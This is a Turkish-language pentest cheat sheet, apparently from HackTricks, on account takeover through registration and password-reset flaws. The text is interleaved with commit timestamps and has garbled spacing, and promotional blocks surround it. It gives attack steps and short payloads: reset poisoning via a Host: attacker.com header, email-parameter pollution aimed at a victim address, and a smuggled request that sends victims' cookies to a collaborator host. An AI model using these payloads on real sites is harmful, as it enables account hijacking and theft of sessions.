2024-04-18 03:38:35 +00:00
# Kayı t ve Ele Geçirme Güvenlik Açı klı kları
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:43:52 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahramana öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Kı rmı zı Takı m Uzmanı )< / strong > < / a > < strong > ile!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-04-18 03:38:35 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-02-03 14:45:32 +00:00
2024-04-18 03:38:35 +00:00
* **Şirketinizi HackTricks'te reklamı nı zı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARI**]'na göz atı n (https://github.com/sponsors/carlospolop)!
2024-05-05 22:43:52 +00:00
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
* [**PEASS Ailesi'ni** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* **Katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) veya bizi **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** takip edin.**
2024-04-18 03:38:35 +00:00
* **Hacking püf noktaları nı zı paylaşarak PR'lar göndererek** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na katkı da bulunun.
2022-04-28 16:01:33 +00:00
< / details >
2024-04-18 04:08:29 +00:00
### [WhiteIntel](https://whiteintel.io)
2024-04-18 03:38:35 +00:00
2024-05-05 22:43:52 +00:00
< figure > < img src = "../.gitbook/assets/image (1227).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-18 03:38:35 +00:00
2024-05-05 22:43:52 +00:00
[**WhiteIntel** ](https://whiteintel.io ), **karanlı k ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hı rsı z kötü amaçlı yazı lı mlar** tarafı ndan **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
2024-04-18 03:38:35 +00:00
2024-05-05 22:43:52 +00:00
WhiteIntel'in başlı ca amacı , bilgi çalan kötü amaçlı yazı lı mlardan kaynaklanan hesap ele geçirmeleri ve fidye yazı lı mı saldı rı ları yla mücadele etmektir.
2024-04-18 03:38:35 +00:00
Websitesini ziyaret edebilir ve motorları nı **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
2024-05-05 22:43:52 +00:00
***
2024-04-18 03:38:35 +00:00
2024-02-10 18:14:16 +00:00
## Kayı t Ele Geçirme
2022-04-28 16:01:33 +00:00
2024-05-05 22:43:52 +00:00
### Çoğaltı lmı ş Kayı t
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
* Var olan bir kullanı cı adı kullanarak oluşturmayı deneyin
* E-postayı değiştirerek kontrol edin:
* büyük harf
* \+1@
2024-04-18 04:08:29 +00:00
* e-postada nokta ekleyin
2024-02-10 18:14:16 +00:00
* e-posta adı nda özel karakterler (%00, %09, %20)
* E-postadan sonra siyah karakterler ekleyin: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
2021-06-27 14:55:59 +00:00
2024-04-18 03:38:35 +00:00
### Kullanı cı Adı Sı ralaması
2021-06-27 14:55:59 +00:00
2024-04-18 03:38:35 +00:00
Bir kullanı cı adı nı n uygulama içinde zaten kaydedilip kaydedilmediğini anlamaya çalı şı n.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### Şifre Politikası
2021-06-27 14:55:59 +00:00
2024-05-05 22:43:52 +00:00
Kullanı cı oluştururken şifre politikası nı kontrol edin (zayı f şifreler kullanı lı p kullanı lamayacağı nı kontrol edin).\
2024-04-18 03:38:35 +00:00
Bu durumda kimlik bilgilerini brute force deneyebilirsiniz.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### SQL Enjeksiyonu
2021-06-27 14:55:59 +00:00
2024-05-05 22:43:52 +00:00
[**Bu sayfayı kontrol edin** ](sql-injection/#insert-statement )hesap ele geçirmeleri yapmaya veya kayı t formları ndan bilgi çekmeye yönelik **SQL Enjeksiyonları ** denemek için.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### Oauth Ele Geçirmeleri
2021-06-27 14:55:59 +00:00
2023-02-16 18:26:56 +00:00
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md ](oauth-to-account-takeover.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-06-27 14:55:59 +00:00
2024-04-18 03:38:35 +00:00
### SAML Güvenlik Açı klı kları
2021-06-27 14:55:59 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="saml-attacks/" %}
[saml-attacks ](saml-attacks/ )
{% endcontent-ref %}
2021-06-27 15:43:01 +00:00
2024-02-10 18:14:16 +00:00
### E-posta Değiştirme
2021-06-27 15:43:01 +00:00
2024-04-18 03:38:35 +00:00
Kayı t olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandı ğı nı veya rastgele e-postalara değiştirilebileceğini kontrol edin.
2021-06-27 14:55:59 +00:00
2024-04-18 03:38:35 +00:00
### Daha Fazla Kontrol
2021-06-27 14:55:59 +00:00
2024-04-18 03:38:35 +00:00
* **Tek kullanı mlı k e-postaları ** kullanı p kullanamayacağı nı zı kontrol edin
* **Uzun** **şifre** (>200) **DoS** 'a neden olur
2024-05-05 22:43:52 +00:00
* **Hesap oluşturmadaki hı z sı nı rları nı kontrol edin**
2024-02-10 18:14:16 +00:00
* username@**burp\_collab**.net kullanı n ve **geri çağrı yı ** analiz edin
2021-11-30 00:17:48 +00:00
2024-05-05 22:43:52 +00:00
## **Şifre Sı fı rlama Ele Geçirme**
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
### Referans Aracı lı ğı yla Şifre Sı fı rlama Jetonu Sı zı ntı sı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1. E-posta adresinize şifre sı fı rlama isteği gönderin
2. Şifre sı fı rlama bağlantı sı na tı klayı n
3. Şifreyi değiştirmeyin
2024-05-05 22:43:52 +00:00
4. Herhangi bir 3. taraf web sitesine (örneğin: Facebook, twitter) tı klayı n
2024-04-18 03:38:35 +00:00
5. Burp Suite proxy'de isteği onaylayı n
2024-02-10 18:14:16 +00:00
6. Referer başlı ğı nı n şifre sı fı rlama jetonunu sı zdı rı p sı zdı rmadı ğı nı kontrol edin.
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### Şifre Sı fı rlama Zehirlenmesi <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
1. Burp Suite'de şifre sı fı rlama isteğini onaylayı n
2024-02-10 18:14:16 +00:00
2. Burp Suite'de aşağı daki başlı kları ekleyin veya düzenleyin: `Host: attacker.com` , `X-Forwarded-Host: attacker.com`
3. Değiştirilmiş başlı kla isteği yönlendirin\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host başlı ğı na_ dayalı bir şifre sı fı rlama URL'si arayı n: `https://attacker.com/reset-password.php?token=TOKEN`
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### E-posta Parametresi Aracı lı ğı yla Şifre Sı fı rlama <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
2021-11-30 00:17:48 +00:00
```powershell
# parameter pollution
email=victim@mail.com& email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
2024-02-10 18:14:16 +00:00
### API Parametrelerinde IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
1. Saldı rgan kendi hesabı yla giriş yapmalı ve **Şifre Değiştir** özelliğine gitmelidir.
2. Burp Suite'u başlatı n ve isteği Intercept edin.
3. İsteği tekrarlayı cı sekmesine gönderin ve parametreleri düzenleyin: Kullanı cı Kimliği/e-posta\
2024-02-10 18:14:16 +00:00
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### Zayı f Şifre Sı fı rlama Jetonu <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
Şifre sı fı rlama jetonu her seferinde rastgele oluşturulmalı ve benzersiz olmalı dı r.\
2024-04-18 03:38:35 +00:00
Jetonun süresinin dolup dolmadı ğı nı veya her zaman aynı olup olmadı ğı nı belirlemeye çalı şı n, bazı durumlarda oluşturma algoritması zayı f olabilir ve tahmin edilebilir. Aşağı daki değişkenler algoritma tarafı ndan kullanı labilir.
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
* Zaman Damgası
2024-02-10 18:14:16 +00:00
* Kullanı cı Kimliği
* Kullanı cı nı n E-postası
* Ad ve Soyad
* Doğum Tarihi
* Kriptografi
2024-05-05 22:43:52 +00:00
* Yalnı zca Sayı lar
2024-04-18 03:38:35 +00:00
* Küçük jeton dizisi (karakterler arası nda \[A-Z,a-z,0-9])
2024-05-05 22:43:52 +00:00
* Jetonun yeniden kullanı mı
2024-04-18 03:38:35 +00:00
* Jetonun son kullanma tarihi
2021-11-30 00:17:48 +00:00
2024-05-05 22:43:52 +00:00
### Sı zan Şifre Sı fı rlama Jetonu <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
1. Belirli bir e-posta için API/UI kullanarak şifre sı fı rlama isteği tetikleyin, örneğin: test@mail.com
2. Sunucu yanı tı nı inceleyin ve `resetToken` için kontrol edin
2024-05-05 22:43:52 +00:00
3. Ardı ndan jetonu aşağı daki gibi bir URL'de kullanı n: `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
### Kullanı cı Adı Çakı şması Yoluyla Şifre Sı fı rlama <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
2021-11-30 00:17:48 +00:00
2024-05-05 22:43:52 +00:00
1. Kurbanı n kullanı cı adı na, kullanı cı adı nı n başı na ve/veya sonuna boşluklar eklenmiş, ancak kurbanı n kullanı cı adı yla aynı olan bir kullanı cı adı yla sistemde kaydolun, örneğin: `"admin "`
2. Kötü niyetli kullanı cı adı nı zla bir şifre sı fı rlama isteği isteyin.
2024-04-18 03:38:35 +00:00
3. E-postanı za gönderilen jetonu kullanı n ve kurbanı n şifresini sı fı rlayı n.
2024-05-05 22:43:52 +00:00
4. Yeni şifreyle kurban hesabı na bağlanı n.
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
Platform CTFd bu saldı rı ya karşı savunması zdı .\
2024-02-10 18:14:16 +00:00
Bkz: [CVE-2020-7245 ](https://nvd.nist.gov/vuln/detail/CVE-2020-7245 )
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
### XSS Aracı lı ğı yla Hesap Ele Geçirme <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
2021-11-30 00:17:48 +00:00
2024-05-05 22:43:52 +00:00
1. Uygulama içinde veya çerezlerin üst alan etki alanı na (`*.domain.com`) kapsandı ğı bir alt alanı nda XSS bulun.
2024-04-18 03:38:35 +00:00
2. Mevcut **oturum çerezini** sı zdı rı n
3. Çerez kullanarak kullanı cı olarak kimlik doğrulayı n
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
### HTTP İstek Kaçı rma Aracı lı ğı yla Hesap Ele Geçirme <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
2021-11-30 00:17:48 +00:00
2024-04-18 04:08:29 +00:00
1\. Türde HTTP İstek Kaçı rma (CL, TE, CL.TE) tespit etmek için **smuggler** 'ı kullanı n\
2021-11-30 00:17:48 +00:00
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h` \
2024-04-18 03:38:35 +00:00
2\. `POST / HTTP/1.1` 'i aşağı daki verilerle üzerine yazacak bir istek oluşturun:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` hedef, kurbanları burpcollab'a yönlendirmek ve çerezlerini çalmaktı r\
3\. Son istek aşağı daki gibi olabilir
2021-11-30 00:17:48 +00:00
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
2024-05-05 22:43:52 +00:00
Hackerone raporları bu hatayı sömürüyor\
* [https://hackerone.com/reports/737140 ](https://hackerone.com/reports/737140 )\
* [https://hackerone.com/reports/771666 ](https://hackerone.com/reports/771666 )
2021-11-30 00:17:48 +00:00
2024-05-05 22:43:52 +00:00
### CSRF Aracı lı ğı yla Hesap Ele Geçirme <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. CSRF için bir yük oluştur, örn: "Şifre değişikliği için otomatik gönderimli HTML formu"
2. Yükü gönder
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
### JWT Aracı lı ğı yla Hesap Ele Geçirme <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
2021-11-30 00:17:48 +00:00
2024-04-18 03:38:35 +00:00
JSON Web Token, bir kullanı cı yı doğrulamak için kullanı labilir.
2021-11-30 00:17:48 +00:00
2024-05-05 22:43:52 +00:00
* JWT'yi başka bir Kullanı cı Kimliği / E-posta ile düzenle
* Zayı f JWT imzası nı kontrol et
2021-11-30 00:17:48 +00:00
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md ](hacking-jwt-json-web-tokens.md )
{% endcontent-ref %}
2024-02-10 18:14:16 +00:00
## Referanslar
2021-11-30 00:17:48 +00:00
* [https://salmonsec.com/cheatsheet/account\_takeover ](https://salmonsec.com/cheatsheet/account\_takeover )
2022-04-28 16:01:33 +00:00
2024-04-18 04:08:29 +00:00
### [WhiteIntel](https://whiteintel.io)
2024-04-18 03:38:35 +00:00
2024-05-05 22:43:52 +00:00
< figure > < img src = "../.gitbook/assets/image (1227).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-18 03:38:35 +00:00
[**WhiteIntel** ](https://whiteintel.io ), **karanlı k ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hı rsı z kötü amaçlı yazı lı mlar** tarafı ndan **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.
WhiteIntel'in başlı ca amacı , bilgi çalan kötü amaçlı yazı lı mlardan kaynaklanan hesap ele geçirmeleri ve fidye yazı lı mı saldı rı ları yla mücadele etmektir.
Websitesini ziyaret edebilir ve motorları nı **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:43:52 +00:00
< summary > < strong > Sı fı rdan kahraman olmak için AWS hackleme öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-05-05 22:43:52 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-02-03 14:45:32 +00:00
2024-05-05 22:43:52 +00:00
* **Şirketinizi HackTricks'te reklamı nı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARINI** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alı n** ](https://peass.creator-spring.com )
* [**The PEASS Family'yi** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* **💬 [Discord grubuna ](https://discord.gg/hRep4RUj7f ) veya [telegram grubuna ](https://t.me/peass ) katı lı n veya** bizi **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** takip edin.**
* **Hacking püf noktaları nı zı göndererek HackTricks ve HackTricks Cloud** github depoları na PR'lar göndererek paylaşı n.
2022-04-28 16:01:33 +00:00
< / details >